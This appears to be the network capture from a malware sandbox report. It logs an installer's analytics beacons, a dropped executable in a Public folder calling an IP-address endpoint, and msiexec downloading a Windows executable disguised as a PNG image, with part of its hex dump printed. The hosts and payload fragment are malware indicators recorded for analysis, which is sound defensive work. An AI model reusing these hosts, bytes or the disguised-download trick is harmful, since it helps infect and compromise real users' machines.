                              Date: Fri, 02 Aug 2024 12:16:59 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:59.996782064 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 194
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.170614958 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.171952009 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 210
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.344228029 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.345217943 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 211
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.515794992 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.517040968 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 193
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.634789944 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.636797905 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 207
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.753201008 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.754173994 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 199
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:00.927346945 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:00 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:00.930677891 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 201
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.105218887 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.106472969 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 201
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.300098896 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.301229954 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 203
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.418885946 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.420043945 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 202
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.591351032 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.592506886 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 204
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.763144970 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.772264004 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 204
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:01.889184952 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:01 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:01.890789986 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 207
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.076070070 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.084894896 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 206
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.261106968 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.262398005 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 201
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.434998989 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.436314106 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 208
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.607554913 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.608793974 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 212
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.779546022 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.782300949 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 191
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:02.955787897 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:02 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:02.957190990 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 183
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:03.129096985 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.143570900 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 176
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:03.264168024 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.275492907 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 184
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:03.447489023 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.448471069 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 184
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:17:03.624078989 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:17:03.625138998 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 172
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                               Aug 2, 2024 14:17:03.797333002 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:03.802505016 CEST | 396 bytes | OUT | POST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 179
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                               Aug 2, 2024 14:17:03.975414991 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:03 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:03.976695061 CEST | 396 bytes | OUT | POST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 219
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                               Aug 2, 2024 14:17:04.104751110 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:04.106086969 CEST | 396 bytes | OUT | POST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 181
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                               Aug 2, 2024 14:17:05.217828035 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:05.219234943 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:05.220309019 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                               Aug 2, 2024 14:17:05.221962929 CEST | 122 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:17:04 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.9 | 49712 | 20.15.106.83 | 80 | 7820 | C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Aug 2, 2024 14:17:15.660221100 CEST | 191 bytes | OUT | GET /SCP/index.php?VS=VS3&PL=NAO HTTP/1.1
                              User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"
                              Host: 20.15.106.83
                              Connection: Keep-Alive
                               Aug 2, 2024 14:17:16.350012064 CEST | 256 bytes | IN | HTTP/1.1 302 Found
                              Date: Fri, 02 Aug 2024 12:17:16 GMT
                              Server: Apache/2.4.58 (Ubuntu)
                              Location: https://acons2020temix54.lisf/
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 4e 65 77 20 59 6f 72 6b
                              Data Ascii: New York


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.9 | 49706 | 188.114.97.3 | 443 | 7176 | C:\Windows\SysWOW64\msiexec.exe
                               Timestamp | Bytes transferred | Direction | Data
                               2024-08-02 12:16:47 UTC | 164 bytes | OUT | GET /carol1.png HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Host: yznv.prefintions.pro
                               2024-08-02 12:16:48 UTC | 695 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:47 GMT
                              Content-Type: image/png
                              Content-Length: 702976
                              Connection: close
                              Last-Modified: Fri, 02 Aug 2024 00:37:11 GMT
                              ETag: "aba00-61ea88725bbc0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: MISS
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZC2%2Fv7CG48TKMwUOe12u0YxWOsjBgG%2Bklnz%2BHEJfdcRxvXDOLU1W13%2FnWNaqt8nVdi0xgkfNVPUTbrx6Wi6diYHtKe4snhO%2B3BWM07xghnIxgKXcd1zaVUDZCtdNW7%2FEWnDpSoXNmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ace0049cd335e66-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-02 12:16:48 UTC674INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 37 29 ac 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 e0 03 00 00 0e 00 00 00 00 00 00 fe fd 03 00 00 20 00 00 00 00 04 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 4c 00 04 00 28 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7)f! @L(
                              2024-08-02 12:16:48 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              2024-08-02 12:16:48 UTC1369INData Raw: 27 00 00 6a 5a 2a 11 04 2a 11 04 15 6a 2e 10 11 04 17 6a 33 14 21 ff ff ff ff ff ff ff 7f 2a 21 00 00 00 00 00 00 00 80 2a 72 e7 00 00 70 12 04 28 28 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 72 17 01 00 70 12 03 fe 16 04 00 00 02 6f 20 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 02 6f 64 00 00 06 2a 72 b9 00 00 70 02 6f 4f 00 00 06 0a 12 00 fe 16 08 00 00 02 6f 20 00 00 0a 28 21 00 00 0a 73 4c 00 00 06 7a 00 13 30 05 00 9f 00 00 00 06 00 00 11 16 6a 0a 16 0b 16 0c 02 28 70 00 00 06 13 04 2b 37 09 17 59 45 03 00 00 00 02 00 00 00 0b 00 00 00 14 00 00 00 2b 1b 02 6f 77 00 00 06 0a 2b 18 02 6f 5a 00 00 06 0b 2b 0f 02 6f 5a 00 00 06 0c 2b 06 02 6f 76 00 00 06 02 6f 71 00 00 06 25 0d 16 30 be 11 04 02 28 6f 00 00 06 06 2d 09 07 2d 06 7e 29 00 00 0a 2a 06 15 6e
                              Data Ascii: 'jZ**j.j3!*!*rp(((!sLzrpo (!sLzod*rpoOo (!sLz0j(p+7YE+ow+oZ+oZ+ovoq%0(o--~)*n
                              2024-08-02 12:16:48 UTC1369INData Raw: 02 16 0d 09 39 9d 00 00 00 06 2c 73 02 6f 34 00 00 0a 13 06 02 75 23 00 00 01 2d 25 03 12 06 6f 18 00 00 06 10 02 04 16 2f 17 72 1c 02 00 70 11 06 6f 32 00 00 0a 28 21 00 00 0a 73 33 00 00 0a 7a 03 6f 19 00 00 06 11 06 12 05 6f 9b 00 00 06 11 05 2d 03 1a 2b 01 19 16 03 28 1b 00 00 06 03 28 3e 00 00 06 11 05 2d 16 1e 18 03 28 1b 00 00 06 03 11 06 6f 46 00 00 06 03 28 35 00 00 06 1f 0a 07 03 28 1b 00 00 06 02 75 23 00 00 01 2c 0e 02 74 23 00 00 01 03 28 35 00 00 06 2b 08 02 04 03 28 15 00 00 06 08 03 28 25 00 00 06 2a 5a 20 b2 07 00 00 17 17 16 16 16 16 73 35 00 00 0a 80 0e 00 00 04 2a 00 00 00 03 30 08 00 6e 00 00 00 00 00 00 00 04 2d 0b 72 30 0d 00 70 73 1b 00 00 0a 7a 04 7b 21 00 00 04 2d 0b 72 3e 0d 00 70 73 33 00 00 0a 7a 02 04 28 21 00 00 06 03 16 32
                              Data Ascii: 9,so4u#-%o/rpo2(!s3zoo-+((>-(oF(5(u#,t#(5+((%*Z s5*0n-r0psz{!-r>ps3z(!2
                              2024-08-02 12:16:48 UTC1369INData Raw: d4 2a 20 80 00 00 00 03 28 2c 00 00 06 02 03 7b 2a 00 00 04 03 7b 2b 00 00 04 03 7b 2a 00 00 04 8e 69 03 7b 2b 00 00 04 59 6f a9 00 00 0a 25 0c 16 31 1e 03 25 7b 2c 00 00 04 08 58 7d 2c 00 00 04 03 25 7b 2b 00 00 04 08 58 7d 2b 00 00 04 2b b1 2a c2 02 16 fe 04 16 fe 01 28 b2 00 00 06 03 25 7b 2b 00 00 04 02 58 7d 2b 00 00 04 03 25 7b 2c 00 00 04 02 58 7d 2c 00 00 04 03 15 7d 25 00 00 04 2a 26 02 03 16 28 24 00 00 06 2a 00 00 13 30 04 00 c3 00 00 00 0e 00 00 11 02 7b 28 00 00 04 2d 10 02 73 74 01 00 06 7d 28 00 00 04 38 9d 00 00 00 03 39 97 00 00 00 02 7b 28 00 00 04 03 6f 7e 01 00 06 25 0a 16 3f 83 00 00 00 72 5c 0f 00 70 28 ae 00 00 06 02 7b 28 00 00 04 6f 7b 01 00 06 0b 2b 1d 12 01 28 c9 01 00 06 0c 08 2c 08 08 6f 20 00 00 0a 2b 05 72 84 07 00 70 28 ae
                              Data Ascii: * (,{*{+{*i{+Yo%1%{,X},%{+X}++*(%{+X}+%{,X},}%*&($*0{(-st}(89{(o~%?r\p({(o{+(,o +rp(
